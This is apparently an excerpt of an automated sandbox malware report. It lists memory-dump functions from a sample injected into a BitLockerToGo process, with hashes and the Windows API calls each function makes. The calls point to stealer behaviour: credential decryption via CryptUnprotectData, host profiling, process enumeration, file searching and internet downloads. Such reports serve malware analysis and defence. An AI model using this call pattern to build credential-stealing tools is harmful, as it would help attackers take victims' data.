                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3334442632-0
                                                                                                                                                                • Opcode ID: 337122136ad9be328570b5f2ec0b8fb8520eba5f62e5a6fcb9a1b6237580c23f
                                                                                                                                                                • Instruction ID: 9777a20387cf4585a0ea211ed432f6bf3dbef2836d781a8f295ead5a715e6412
                                                                                                                                                                • Opcode Fuzzy Hash: 337122136ad9be328570b5f2ec0b8fb8520eba5f62e5a6fcb9a1b6237580c23f
                                                                                                                                                                • Instruction Fuzzy Hash: C591567AA022049BDB14FBB0ED559EE737DAFC4310F408558E81A9F184EF749B1D8BA1
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 03004FCA
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03004FD1
                                                                                                                                                                • InternetOpenA.WININET(03020DDF,00000000,00000000,00000000,00000000), ref: 03004FEA
                                                                                                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 03005011
                                                                                                                                                                • InternetReadFile.WININET(03015EDB,?,00000400,00000000), ref: 03005041
                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001), ref: 0300508A
                                                                                                                                                                • InternetCloseHandle.WININET(03015EDB), ref: 030050B9
                                                                                                                                                                • InternetCloseHandle.WININET(?), ref: 030050C6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1008454911-0
                                                                                                                                                                • Opcode ID: ace0ffa0fe90d0189e04c56b7f667d348ca0cc9868648b44dcbaf06e090ed57c
                                                                                                                                                                • Instruction ID: 7f00477b429312138b79485dba771c6d5590afd08f0dcb321dd895127e34ca54
                                                                                                                                                                • Opcode Fuzzy Hash: ace0ffa0fe90d0189e04c56b7f667d348ca0cc9868648b44dcbaf06e090ed57c
                                                                                                                                                                • Instruction Fuzzy Hash: DF3116B4A41218ABEB20DF54DD88BDDB7B4FB48704F1081D8FB09A7284D7706AC58F98
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,030205AF), ref: 03017BE1
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 03017BF9
                                                                                                                                                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 03017C0D
                                                                                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 03017C62
                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 03017D22
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                • String ID: /
                                                                                                                                                                • API String ID: 3090951853-4001269591
                                                                                                                                                                • Opcode ID: 340312ccfc71ec4f54423e031f95974c664b4c5f282b2d1bdab97239308211a3
                                                                                                                                                                • Instruction ID: 576e995357c97a6c95f9a08c79d703fb1d4270a681076a742fd4fae8217ca5e7
                                                                                                                                                                • Opcode Fuzzy Hash: 340312ccfc71ec4f54423e031f95974c664b4c5f282b2d1bdab97239308211a3
                                                                                                                                                                • Instruction Fuzzy Hash: AD413D75942218ABDB24DB94EC98FEEB7B8FB44710F1041D9E00966180DB746F96CFA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 0301A740: lstrcpy.KERNEL32(03020AEF,00000000), ref: 0301A788
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcpy.KERNEL32(00000000,?), ref: 0301A972
                                                                                                                                                                  • Part of subcall function 0301A920: lstrcat.KERNEL32(00000000), ref: 0301A982
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrlen.KERNEL32(?,03021110,?,00000000,03020AEF), ref: 0301A9C5
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcpy.KERNEL32(00000000), ref: 0301AA04
                                                                                                                                                                  • Part of subcall function 0301A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0301AA12
                                                                                                                                                                  • Part of subcall function 0301A8A0: lstrcpy.KERNEL32(?,03020AEF), ref: 0301A905
                                                                                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,03020D73), ref: 0300E4A2
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214F8), ref: 0300E4F2
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,030214FC), ref: 0300E508
                                                                                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0300EBDF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                • API String ID: 433455689-1173974218
                                                                                                                                                                • Opcode ID: 750fe043c690daaea065b0be3ca011eb17869531cfe672ab91792838b7c28043
                                                                                                                                                                • Instruction ID: 45c23b7684452c98b95db24cfb41375c004396e6e8f49cb817385407da911068
                                                                                                                                                                • Opcode Fuzzy Hash: 750fe043c690daaea065b0be3ca011eb17869531cfe672ab91792838b7c28043
                                                                                                                                                                • Instruction Fuzzy Hash: 5412677AA133149BDB18FB70DD94EEE7338AF94310F404599A50A5A190EF706F5ACFA0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0301961E
                                                                                                                                                                • Process32First.KERNEL32(03020ACA,00000128), ref: 03019632
                                                                                                                                                                • Process32Next.KERNEL32(03020ACA,00000128), ref: 03019647
                                                                                                                                                                • StrCmpCA.SHLWAPI(?,00000000), ref: 0301965C
                                                                                                                                                                • CloseHandle.KERNEL32(03020ACA), ref: 0301967A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 420147892-0
                                                                                                                                                                • Opcode ID: e019e8d8bf303b68c54d946bc63305a95a7e7572573383b8ba8c63c02f8415f1
                                                                                                                                                                • Instruction ID: 33ac0988f9286413c97f89756bb50692431d7943359dca992e5de1f4f00f533b
                                                                                                                                                                • Opcode Fuzzy Hash: e019e8d8bf303b68c54d946bc63305a95a7e7572573383b8ba8c63c02f8415f1
                                                                                                                                                                • Instruction Fuzzy Hash: C2012579A51208EBCB14DFA5D958BDDB7F8FF48700F008188A50597244D7349B50CFA0
                                                                                                                                                                APIs
                                                                                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 03009B84
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 03009BA3
                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 03009BC6
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 03009BD3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3243516280-0
                                                                                                                                                                • Opcode ID: c88439f8942b274aad724bb9ec88cee880832341eba12ef69bc4a64a445f8db2
                                                                                                                                                                • Instruction ID: edf40bb30e1ee95a025fd30c12d2d0a7b3b8b5edd36b00c63700a0fea685bbfb
                                                                                                                                                                • Opcode Fuzzy Hash: c88439f8942b274aad724bb9ec88cee880832341eba12ef69bc4a64a445f8db2
                                                                                                                                                                • Instruction Fuzzy Hash: 0311BAB8A00209EFDB04DF94D989AAEB7F5FF88304F104558E91597394D774AE50CF61
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,03555F28,00000000,?,03020E10,00000000,?,00000000,00000000), ref: 03017A63
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03017A6A
                                                                                                                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,03555F28,00000000,?,03020E10,00000000,?,00000000,00000000,?), ref: 03017A7D
                                                                                                                                                                • wsprintfA.USER32 ref: 03017AB7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3317088062-0
                                                                                                                                                                • Opcode ID: e3e0fb6b9507e79d8c374bc2d4851707a5349562b7e314bffb4938cc7d5ecf97
                                                                                                                                                                • Instruction ID: 4d75731ba4c3e5244998a2b97a9316662a2d2a58fab45549f14327a322f33224
                                                                                                                                                                • Opcode Fuzzy Hash: e3e0fb6b9507e79d8c374bc2d4851707a5349562b7e314bffb4938cc7d5ecf97
                                                                                                                                                                • Instruction Fuzzy Hash: FC1152B1946228DFEB10DB54EC49FAAB7B8F744711F004795E51693280D7745A44CF51
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,030011B7), ref: 03017880
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 03017887
                                                                                                                                                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0301789F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000308F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003092000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030B1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000030EF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000310F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000311B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031A5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031C5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.00000000031CB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000324A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836955286.000000000325C000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_3000000_BitLockerToGo.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Heap$AllocateNameProcessUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1296208442-0
                                                                                                                                                                • Opcode ID: 7170628863fa0e261dc163437cf8962038cc222a4faf9d27f898f6dc0316a022
                                                                                                                                                                • Instruction ID: 43c1f7c83430484d8ab736c067ceebd3f7b71a7f59eb26d7c35628ad76d9a3d7
                                                                                                                                                                • Opcode Fuzzy Hash: 7170628863fa0e261dc163437cf8962038cc222a4faf9d27f898f6dc0316a022
                                                                                                                                                                • Instruction Fuzzy Hash: 07F04FB5985208EFC710DF98E949BAEBBB8EB04B11F10465AFA15A2680C77415048BA1
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.1836206485.000000000301E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000302B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.000000000305A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003085000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.1836232555.0000000003088000.00000040.00000400.00020000.00000000.sdmpDownload File
